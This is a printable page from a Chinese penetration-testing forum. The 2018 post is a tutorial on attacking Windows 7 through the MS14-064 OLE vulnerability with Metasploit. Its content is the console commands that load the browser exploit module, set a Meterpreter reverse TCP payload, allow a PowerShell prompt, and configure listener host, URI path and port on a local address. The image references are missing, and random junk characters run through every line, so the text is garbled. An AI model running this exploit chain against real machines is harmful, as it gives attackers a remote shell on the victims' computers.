中国网络渗透测试联盟

标题: MS14-064 漏洞测试入侵win7 [打印本页]

作者: admin    时间: 2018-10-20 20:20
标题: MS14-064 漏洞测试入侵win7

1 g' t( r8 c* C8 |/ Q6 `1 U 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 ; t9 S2 K( ]. Q# s! M3 [, y1 p

1 N- R% o* U- R& Z, B6 R" ?# K

c0 h, D! C3 c& f, l/ O9 O 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 8 B" P: i' ^4 U9 M$ z% ~; m9 p

1 ^- {- ?: n. w8 ^' e9 `

/ C2 E0 K; b8 f, R0 Y5 h3 p 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp 7 |) L, F& f+ d |+ M/ O7 k

3 R5 u; B4 c _& r6 r+ ]4 j" l) Q, d

. {1 i$ N$ z8 u' V* {3 H             set AllowPowershellPrompt true# ]) H( M4 W+ Q0 g

- e8 C9 V# S2 f# y7 I( ?2 F2 t

5 q/ p2 i1 X$ k             Set LHOST 192.168.0.109 $ i! f1 }6 x( ~4 \% G3 t; H, Q

6 t$ Y5 B; c9 r0 b0 G

9 Z. ~ v, f3 Z: z' i             set SRVHOST 192.168.0.1097 a! P/ R% t3 m6 @% J

. g8 [+ f: l* o% ]1 k; M3 r; V$ O. @: V

6 H. b+ R0 h6 c- A1 `, J             Set uripath share: ] |3 Q5 P# s9 S9 [6 s% O0 _" u R

6 f3 I6 m: f1 \% }* A/ t% }

# \- B$ u; D- }             Set srvport 801 I2 l0 |9 k& X! h) o: _7 I6 `( q

% V" o4 m, |5 `7 M* n' N2 {! ~ X

( w/ s2 w O0 n2 D" h  : J6 ^, F+ ]& H; |1 U, s

* P3 A: d) j- \3 F6 N; P

* O$ g' `* t4 p8 P1 ^' m V  ( I" s* E7 ^; U

1 U" t# I7 j) ]; P; U- l5 g4 d

% E' [( D8 V3 N& A8 [  0 O5 P! ]$ r8 w* z1 ^2 S0 ]! u

# {4 @5 M& B! T8 I+ `+ G4 f

* K5 w0 i. `& J( t5 u- o  0 Y" G: V( `, j$ I

* D4 J8 Y n' O5 {. e5 j0 F4 k

9 D8 Q" h1 ~2 ]* G( Q  9 t5 L+ A+ [0 X9 U$ g4 |' h1 o

3 k8 W& @1 T: d$ [; @0 m

3 `# j0 Z$ V( |+ E 下面我们来访问本地地址如图: * P, i0 Y: j9 P5 N' `% x, I9 f! u" i

# N- x# k, h" p5 }/ @; r

2 ~; T9 o& r9 v" f5 q I: q8 v  $ V. P- J+ M0 G2 U7 ~; E9 _ Q

6 W' X3 A3 ^8 b1 l6 Z8 O

! n& O7 G" l8 y2 f# Q6 u% K  , D6 R# A* [ I O

+ u& T0 F; n# R, C7 S f5 I. C" W

; V" G, M1 h. g7 r# o$ w3 y9 w 2 n) x! I, b. Z/ S) x$ y" n






欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2